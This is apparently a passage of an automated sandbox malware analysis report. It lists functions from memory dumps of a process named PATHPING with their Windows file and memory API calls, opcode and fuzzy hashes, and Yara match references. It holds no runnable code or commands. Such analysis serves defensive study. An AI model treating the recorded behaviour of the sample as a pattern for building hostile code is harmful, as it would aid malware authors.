40a211-40a21b 89->96 90->88 91->76 92->91 98 40a1a4-40a1aa 93->98 99 40a1ad 93->99 94->93 95->84 101 40a266-40a26d 96->101 102 40a21d-40a264 96->102 98->99 99->80 103 40a278-40a27e 101->103 102->96 105 40a280-40a28c 103->105 106 40a28e 103->106 105->103 106->44
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.4120631323.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_400000_PATHPING.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: "$#$,$.$5 $61$@@$F$N$O$T$U$p$pr$q$s$xQ$|NF$#$'$S
                                                                                                                                • API String ID: 0-3021803578
                                                                                                                                • Opcode ID: 3ded67822e79fecda64eda7d8636d3c5dad77186ac3009fa3e94b0e534046ad3
                                                                                                                                • Instruction ID: 73faa62f29a10e56dace45e1dff4225ed1ec05a634f06d06a51dfbbb11009f6d
                                                                                                                                • Opcode Fuzzy Hash: 3ded67822e79fecda64eda7d8636d3c5dad77186ac3009fa3e94b0e534046ad3
                                                                                                                                • Instruction Fuzzy Hash: 9602B1B0D04319CBDB24CF95C894BDDBBB5BB44308F2081AAC4197B381C7796A99DF46
                                                                                                                                Function 0041C160 Relevance: 4.6, APIs: 3, Instructions: 106fileCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • FindFirstFileW.KERNELBASE(?,00000000), ref: 0041C244
                                                                                                                                • FindNextFileW.KERNELBASE(?,00000010), ref: 0041C27F
                                                                                                                                • FindClose.KERNELBASE(?), ref: 0041C28A
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.4120631323.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_400000_PATHPING.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: Find$File$CloseFirstNext
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3541575487-0
                                                                                                                                • Opcode ID: f574dcca9fe591d4dd08330b55f3ca42781a6a5cf25310e43f55454e88115543
                                                                                                                                • Instruction ID: 2ef897b2c94aef3d03006893bbacc55d665ca5770ac4c45b173264ecf04486b2
                                                                                                                                • Opcode Fuzzy Hash: f574dcca9fe591d4dd08330b55f3ca42781a6a5cf25310e43f55454e88115543
                                                                                                                                • Instruction Fuzzy Hash: 2731A371A403187BDB20DFA1CC85FFF77BCDB84704F14449EB508A6191EA74AA848BA5
                                                                                                                                Function 00428C00 Relevance: 1.6, APIs: 1, Instructions: 101filenativeCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • NtCreateFile.NTDLL(?,?,?,5D33299C,?,?,?,?,?,?,?), ref: 00428CFE
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.4120631323.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_400000_PATHPING.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: CreateFile
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 823142352-0
                                                                                                                                • Opcode ID: 3a538545ac33b4e89461af44c7dd5fa6b640ccf2d02e9bd38c0d6b0058846378
                                                                                                                                • Instruction ID: 94e7981f0094d1299fbff6a41f57b178f1e13be7550df70abf6f4d8b04326c4c
                                                                                                                                • Opcode Fuzzy Hash: 3a538545ac33b4e89461af44c7dd5fa6b640ccf2d02e9bd38c0d6b0058846378
                                                                                                                                • Instruction Fuzzy Hash: 5031EAB5A00248AFCB14DF99D881EDF77B9EF8C314F508119F918A7345D734A851CBA5
                                                                                                                                Function 00428D70 Relevance: 1.6, APIs: 1, Instructions: 93filenativeCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • NtReadFile.NTDLL(?,?,?,5D33299C,?,?,?,?,?), ref: 00428E59
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.4120631323.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_400000_PATHPING.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: FileRead
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2738559852-0
                                                                                                                                • Opcode ID: 3f8db6c77631d86ce37d9d3fe5275efd892d8e28885a73c69f0e239a369adcbe
                                                                                                                                • Instruction ID: 61301c75e98bc4aa872931dba7bd98f3143852991792396e46ca187b41b132b9
                                                                                                                                • Opcode Fuzzy Hash: 3f8db6c77631d86ce37d9d3fe5275efd892d8e28885a73c69f0e239a369adcbe
                                                                                                                                • Instruction Fuzzy Hash: F331EA75A00208AFDB14DF99D881EEFB7B9EF8C714F50821AF918A7341D734A811CBA5
                                                                                                                                Function 00429090 Relevance: 1.6, APIs: 1, Instructions: 81memorynativeCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • NtAllocateVirtualMemory.NTDLL(0041199B,?,00427B1F,5D33299C,00000004,00003000,?,?,?,?,?,00427B1F,0041199B,?,?,0042AFA1), ref: 0042915B
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.4120631323.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_400000_PATHPING.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: AllocateMemoryVirtual
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2167126740-0
                                                                                                                                • Opcode ID: 1409185346ce7a013563e4669413ced259aff9e196a2489ade36b6e6bc90393b
                                                                                                                                • Instruction ID: fcfac83777d1bd894e9302dfe60120c0194716a6880ea0b1e168e6ce1e449545
                                                                                                                                • Opcode Fuzzy Hash: 1409185346ce7a013563e4669413ced259aff9e196a2489ade36b6e6bc90393b
                                                                                                                                • Instruction Fuzzy Hash: 67214DB5A00249AFDB10DF99DC81EEFB7B9EF88714F40411AFD18A7241D774A811CBA5
                                                                                                                                Function 00428E70 Relevance: 1.6, APIs: 1, Instructions: 61filenativeCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.4120631323.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_400000_PATHPING.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: DeleteFile
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 4033686569-0
                                                                                                                                • Opcode ID: 70c51c4d1c49d97d4bd7d0c6d274920f4979941384b9263865c7b785f2aa4232
                                                                                                                                • Instruction ID: 0f79bc1409fe2a4ad032c72e08d2c23460c36f040aac989cd39c3b6e6aafd436
                                                                                                                                • Opcode Fuzzy Hash: 70c51c4d1c49d97d4bd7d0c6d274920f4979941384b9263865c7b785f2aa4232
                                                                                                                                • Instruction Fuzzy Hash: B311C171A00218BFD610EB65DC42FABB7ACDF89324F80810EF918A7281D7746511C7E6
                                                                                                                                Function 00428F20 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 00428F57
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.4120631323.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_400000_PATHPING.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: Close
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3535843008-0
                                                                                                                                • Opcode ID: c327015965e002ba6da806d7b35ba06a045db85dc36153716a3361cbcbb9684d
                                                                                                                                • Instruction ID: cf6a14b6523e47bbd27b9471d6e22a3bd109654453a7a865f20d04c6673a03f9
                                                                                                                                • Opcode Fuzzy Hash: c327015965e002ba6da806d7b35ba06a045db85dc36153716a3361cbcbb9684d
                                                                                                                                • Instruction Fuzzy Hash: 03E046362102147BD620EA5ADC01F9B77ACEBC6724F81841AFA09A7242C674B91287B5
                                                                                                                                Function 02D14340 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.4122030523.0000000002CA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CA0000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002DC9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002DCD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002E3E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_2ca0000_PATHPING.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: InitializeThunk
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                • Opcode ID: 026cef33afc1e512a91f8f0dc408ab999e541793e25e789f4258ac13e575d0c0
                                                                                                                                • Instruction ID: 8b7ef71cf5253f28b3e0dd8a147b30efa105e30620261ddc42f0b1003eb94813
                                                                                                                                • Opcode Fuzzy Hash: 026cef33afc1e512a91f8f0dc408ab999e541793e25e789f4258ac13e575d0c0
                                                                                                                                • Instruction Fuzzy Hash: 9E90023160981012924071584885547400597F0305B55C011E0428674C8E148E5A6371
                                                                                                                                Function 02D14650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.4122030523.0000000002CA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CA0000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002DC9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002DCD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002E3E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_2ca0000_PATHPING.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: InitializeThunk
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                • Opcode ID: aa9c6365d8b04b1606781b1e98ee14281aa94f59c708fb8cfe66376e6137e402
                                                                                                                                • Instruction ID: b66b2122ccc7b73f42794a90594332cfe0f7869d71cfaef6ab2ef30013c05797
                                                                                                                                • Opcode Fuzzy Hash: aa9c6365d8b04b1606781b1e98ee14281aa94f59c708fb8cfe66376e6137e402
                                                                                                                                • Instruction Fuzzy Hash: 1E90026160551042424071584805407600597F1305395C115A0558670C8A188D59A279
                                                                                                                                Function 02D12AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.4122030523.0000000002CA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CA0000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002DC9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002DCD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002E3E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_2ca0000_PATHPING.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: InitializeThunk
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                • Opcode ID: 4753a102461e32f3b66cda374442a2986f3349725e7330b0454b2fec366a8b34
                                                                                                                                • Instruction ID: 302970f2e9052445ed2860a452f3ac52bfebf74dfd33a3d0b087adcd2f11fe28
                                                                                                                                • Opcode Fuzzy Hash: 4753a102461e32f3b66cda374442a2986f3349725e7330b0454b2fec366a8b34
                                                                                                                                • Instruction Fuzzy Hash: F1900225215410030205B5580705507004687E5355355C021F1019670CDA218D656131
                                                                                                                                Function 02D12AF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.4122030523.0000000002CA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CA0000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002DC9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002DCD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002E3E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_2ca0000_PATHPING.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: InitializeThunk
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                • Opcode ID: b62e71b55def450d70027cf44f149703c56434870ce9f126c09c01d30592d5cf
                                                                                                                                • Instruction ID: 9dd7aedb8d2c30f41d135fe8bcd1d4279500bac2bb1116cdc3b9018ca776eabb
                                                                                                                                • Opcode Fuzzy Hash: b62e71b55def450d70027cf44f149703c56434870ce9f126c09c01d30592d5cf
                                                                                                                                • Instruction Fuzzy Hash: 25900225225410020245B558060550B044597E6355395C015F141A6B0CCA218D696331
                                                                                                                                Function 02D12BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.4122030523.0000000002CA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CA0000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002DC9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002DCD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002E3E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_2ca0000_PATHPING.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: InitializeThunk
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                • Opcode ID: ef28cdd7d97d874eb359ec1ae92e23d0baf44edc72b92a7b4cf16c97fce293dd
                                                                                                                                • Instruction ID: 8d1e3b74629ff64164c93fcadf2fef745839ced64e969948833c539176cdbd67
                                                                                                                                • Opcode Fuzzy Hash: ef28cdd7d97d874eb359ec1ae92e23d0baf44edc72b92a7b4cf16c97fce293dd
                                                                                                                                • Instruction Fuzzy Hash: B090023120541802D2807158440564B000587E1305F95C015A0029774DCE158F5D77B1
                                                                                                                                Function 02D12BE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.4122030523.0000000002CA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CA0000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002DC9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002DCD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002E3E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_2ca0000_PATHPING.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: InitializeThunk
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                • Opcode ID: d2493081d2b2187f84ad5718e1222be11566af14c168db591a0330e4dbf740ea
                                                                                                                                • Instruction ID: 1e1aeaa4ac82d7d1abbbd2110eaa026fed30bab2a77d2ff5ca6fbb08163249a3
                                                                                                                                • Opcode Fuzzy Hash: d2493081d2b2187f84ad5718e1222be11566af14c168db591a0330e4dbf740ea
                                                                                                                                • Instruction Fuzzy Hash: 2690023120945842D24071584405A47001587E0309F55C011A00687B4D9A258E59B671
                                                                                                                                Function 02D12BA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.4122030523.0000000002CA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CA0000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002DC9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002DCD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002E3E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_2ca0000_PATHPING.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: InitializeThunk
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                • Opcode ID: 9394f365b9d07be03c7f005b2f831d336207537f3f06aee97aec34bc65b268c9
                                                                                                                                • Instruction ID: 6cd251d8060ed687a4a7b390d58beab5dc735b8aee1a074b0c665d03c5c7ec51
                                                                                                                                • Opcode Fuzzy Hash: 9394f365b9d07be03c7f005b2f831d336207537f3f06aee97aec34bc65b268c9
                                                                                                                                • Instruction Fuzzy Hash: 6590023160941802D25071584415747000587E0305F55C011A0028774D8B558F5976B1
                                                                                                                                Function 02D12B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.4122030523.0000000002CA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CA0000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002DC9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002DCD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002E3E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_2ca0000_PATHPING.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: InitializeThunk
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                • Opcode ID: 15d9e4353769e3f2a68e3ace7d7839f777938f8b513129578de45eed96c7886a
                                                                                                                                • Instruction ID: e0ffafb3b1c7bf707663f9ed77e8c0ad46681c70af63d45e4fb8c6a781900297
                                                                                                                                • Opcode Fuzzy Hash: 15d9e4353769e3f2a68e3ace7d7839f777938f8b513129578de45eed96c7886a
                                                                                                                                • Instruction Fuzzy Hash: BD90026120641003420571584415617400A87F0205B55C021E10186B0DC9258D957135
                                                                                                                                Function 02D12EE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.4122030523.0000000002CA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CA0000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002DC9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002DCD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002E3E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_2ca0000_PATHPING.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: InitializeThunk
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                • Opcode ID: 38466f770d307c66d703d2ffd40bc4779f48e219f2fe7b16c840166bf7549316
                                                                                                                                • Instruction ID: 5e041c2aa0861ea7c293274309732b8a5889284c4fe10eb2023668b259c56a62
                                                                                                                                • Opcode Fuzzy Hash: 38466f770d307c66d703d2ffd40bc4779f48e219f2fe7b16c840166bf7549316
                                                                                                                                • Instruction Fuzzy Hash: 1090026120581403D24075584805607000587E0306F55C011A2068675E8E298D557135
                                                                                                                                Function 02D12E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.4122030523.0000000002CA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CA0000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002DC9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002DCD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002E3E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_2ca0000_PATHPING.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: InitializeThunk
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                • Opcode ID: 2f5b491b51b2bc1e244268e32cca38a56545962b56f6b286dd1b6c08eb529199
                                                                                                                                • Instruction ID: 9e5bbba504dc59ca6c4049848ba6fb757cd822ca8c8465f0f679b0155a11d50e
                                                                                                                                • Opcode Fuzzy Hash: 2f5b491b51b2bc1e244268e32cca38a56545962b56f6b286dd1b6c08eb529199
                                                                                                                                • Instruction Fuzzy Hash: 0F90022160541502D20171584405617000A87E0245F95C022A1028675ECE258E96B131
                                                                                                                                Function 02D12FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.4122030523.0000000002CA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CA0000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002DC9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002DCD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002E3E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_2ca0000_PATHPING.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: InitializeThunk
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                • Opcode ID: 71dec59a37c9d4132ae00a69f11026d08d7d667957e0252b0addb871080dfd0b
                                                                                                                                • Instruction ID: 2ea271963a79e0c8e28835e59831150a103fd4509798a6bfe99e54a409a6e62b
                                                                                                                                • Opcode Fuzzy Hash: 71dec59a37c9d4132ae00a69f11026d08d7d667957e0252b0addb871080dfd0b
                                                                                                                                • Instruction Fuzzy Hash: 3A900221215C1042D30075684C15B07000587E0307F55C115A0158674CCD158D656531
                                                                                                                                Function 02D12FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.4122030523.0000000002CA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CA0000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002DC9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002DCD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002E3E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_2ca0000_PATHPING.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: InitializeThunk
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                • Opcode ID: 1b21d2a0ed4d2687dcf9bf14114962ddca46953baa0b4faec7b63187dadf5f2c
                                                                                                                                • Instruction ID: 706bcd7bd343031a12126601432e6c7584969e042ee4ad057db0d523bb589b39
                                                                                                                                • Opcode Fuzzy Hash: 1b21d2a0ed4d2687dcf9bf14114962ddca46953baa0b4faec7b63187dadf5f2c
                                                                                                                                • Instruction Fuzzy Hash: E7900221605410424240716888459074005ABF1215755C121A099C670D89598D696675
                                                                                                                                Function 02D12F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.4122030523.0000000002CA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CA0000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002DC9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002DCD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002E3E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_2ca0000_PATHPING.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: InitializeThunk
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                • Opcode ID: 473b4958d26fb339e8c5a0f4984237e779a6c77559e34bae8ecf19abde32f5a7
                                                                                                                                • Instruction ID: fb4bdd874ec724fbb68641ee0e318105179e8afdd406b428234772befe40dcf9
                                                                                                                                • Opcode Fuzzy Hash: 473b4958d26fb339e8c5a0f4984237e779a6c77559e34bae8ecf19abde32f5a7
                                                                                                                                • Instruction Fuzzy Hash: 8B90026134541442D20071584415B070005C7F1305F55C015E1068674D8A19CD567136
                                                                                                                                Function 02D12CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.4122030523.0000000002CA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CA0000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002DC9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002DCD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002E3E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_2ca0000_PATHPING.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: InitializeThunk
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                • Opcode ID: 6bdffe91864cab40b96637b7f5f640f9d1fc74256e904a2f868fa4dbee7b7931
                                                                                                                                • Instruction ID: 49284b4bae366d1b2a5c6f211d97948b1e77bd25021d960142838b5ae1a3bf31
                                                                                                                                • Opcode Fuzzy Hash: 6bdffe91864cab40b96637b7f5f640f9d1fc74256e904a2f868fa4dbee7b7931
                                                                                                                                • Instruction Fuzzy Hash: 0C90023120541402D20075985409647000587F0305F55D011A5028675ECA658D957131
                                                                                                                                Function 02D12C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.4122030523.0000000002CA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CA0000, based on PE: true
